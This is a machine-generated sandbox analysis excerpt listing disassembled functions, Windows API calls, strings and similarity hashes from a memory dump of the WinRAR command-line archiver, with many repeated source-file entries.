                                                                                                                                                                                                                              control_flow_graph 1894 7ff74ee91e80-7ff74ee91ebb call 7ff74eeca5a0 1897 7ff74ee91ec8 1894->1897 1898 7ff74ee91ebd-7ff74ee91ec1 1894->1898 1900 7ff74ee91ecb-7ff74ee91f57 CreateFileW 1897->1900 1898->1897 1899 7ff74ee91ec3-7ff74ee91ec6 1898->1899 1899->1900 1901 7ff74ee91f59-7ff74ee91f76 GetLastError call 7ff74eea4534 1900->1901 1902 7ff74ee91fcd-7ff74ee91fd1 1900->1902 1912 7ff74ee91f78-7ff74ee91fb6 CreateFileW GetLastError 1901->1912 1913 7ff74ee91fba 1901->1913 1903 7ff74ee91fd3-7ff74ee91fd7 1902->1903 1904 7ff74ee91ff7-7ff74ee9200f 1902->1904 1903->1904 1906 7ff74ee91fd9-7ff74ee91ff1 SetFileTime 1903->1906 1907 7ff74ee92011-7ff74ee92022 call 7ff74eeba9e8 1904->1907 1908 7ff74ee92027-7ff74ee9204b call 7ff74eeca610 1904->1908 1906->1904 1907->1908 1912->1902 1915 7ff74ee91fb8 1912->1915 1916 7ff74ee91fbf-7ff74ee91fc1 1913->1916 1915->1916 1916->1902 1917 7ff74ee91fc3 1916->1917 1917->1902
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1999340476-0
                                                                                                                                                                                                                              • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                              • Instruction ID: 6a6a9144d78694dc2085dc2329e273d324cacda70e7abc2e9051b9ca62e9db0a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD412672A1C6A186FB60AB24E4047B9A6D0BB45BB8F810334DE7D07AC4DFBDD4858B10

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                              • API String ID: 233258989-2235180025
                                                                                                                                                                                                                              • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                              • Instruction ID: 75b180fd238f5f66ea1445500835fa00523d5b1e8712fb2febc8350bbca06f21
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5418C22A1C6A2C5FB14FB21D4511B9A3A0FB447B8FC00A35EA9D03AD6EFBCD545C320

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                                                                              • String ID: rar.lng
                                                                                                                                                                                                                              • API String ID: 553376247-2410228151
                                                                                                                                                                                                                              • Opcode ID: aae33f096e44b7179777c7a4e7d7280ac8be15058bdc46fbde8d3aab13c1519a
                                                                                                                                                                                                                              • Instruction ID: f1139b56a86aec8a8da0fc4590344b3b8be0c368c5a341017a7c676aa707b8dd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aae33f096e44b7179777c7a4e7d7280ac8be15058bdc46fbde8d3aab13c1519a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E241AE21E0C6A2C5FB10FB21A8112B9E391BF41774FC85139E94E0B2D7DEADE9058770

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SHGetMalloc.SHELL32(?,00000800,?,00007FF74EEA4432,?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EEA40C4
                                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EEA40DF
                                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32 ref: 00007FF74EEA40F1
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EE93458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF74EEA413F,?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EE934A0
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EE93458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF74EEA413F,?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EE934D5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                              • String ID: WinRAR
                                                                                                                                                                                                                              • API String ID: 977838571-3970807970
                                                                                                                                                                                                                              • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                              • Instruction ID: d393a0a23045304581f239abb124d9755747f72c4641785fc18abaf284b21419
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC219D22A0CB52C0FA50BF26F9401BAA360BF99BE4B885035DF4E47B55DEBCD4448720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF74EED3CEF,?,?,00000000,00007FF74EED3CAA,?,?,00000000,00007FF74EED3FD9), ref: 00007FF74EED97A5
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF74EED3CEF,?,?,00000000,00007FF74EED3CAA,?,?,00000000,00007FF74EED3FD9), ref: 00007FF74EED9807
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF74EED3CEF,?,?,00000000,00007FF74EED3CAA,?,?,00000000,00007FF74EED3FD9), ref: 00007FF74EED9841
                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF74EED3CEF,?,?,00000000,00007FF74EED3CAA,?,?,00000000,00007FF74EED3FD9), ref: 00007FF74EED986B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1557788787-0
                                                                                                                                                                                                                              • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                              • Instruction ID: 9724eabc0c25a443c916167da472e6c6f0296d8cd4b6934b75cfe14735c309ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA217121E0C7A2C1F660BF12A840529B6A4BB58FE0F8C4135DA9E27B94DFBDD4518314
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2244327787-0
                                                                                                                                                                                                                              • Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                                                                              • Instruction ID: b9623e230f643df866c4414e33bc786d2a88990d1fa7c0998361e7f7f05ede17
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16219321E0C676C1FA64BB25E400339E3E4BF42BB5F914631E95D476C8CFAED8808761
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: AFUM$default.sfx
                                                                                                                                                                                                                              • API String ID: 0-2491287583
                                                                                                                                                                                                                              • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                              • Instruction ID: e0a86df632fce71fe9ef24f35d062e855bc626ef06f293887f715131e0da3a2d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1981AF22A0C6F2C0FB70BB1191402BDA2A4FF517A4FC48135DA8D476D6EFADA985C730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                              • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                              • Instruction ID: 6fbc5cc393e89eb64981810d2dc455d56084efbf45a9bbb95ff7b58bb9009dc0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B721F462A0C763C0FB60BB24A490439A650FB45730F6C1736DA7E467D4CE78E881C311
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                              • String ID: CreateThread failed
                                                                                                                                                                                                                              • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                              • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                              • Instruction ID: 2320bb7dcd5a2fab39d51a24e2607f5cb63b1d65dc3162ccc388600ee779e172
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64118F31A0CA52C6FB44FB15E8801BAB3A0FB847A4FD44131D69D07669DFBCE646C720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3094578987-0
                                                                                                                                                                                                                              • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                              • Instruction ID: 78359bc5a0feac0276bb9a036ed8a56bdd4464b55e74de01a621bbc797d3be9b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CF06222A0CB56C2FA20FF15F5840B9B360FB89BB8F940230DE9D06669DF6CD6458B10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
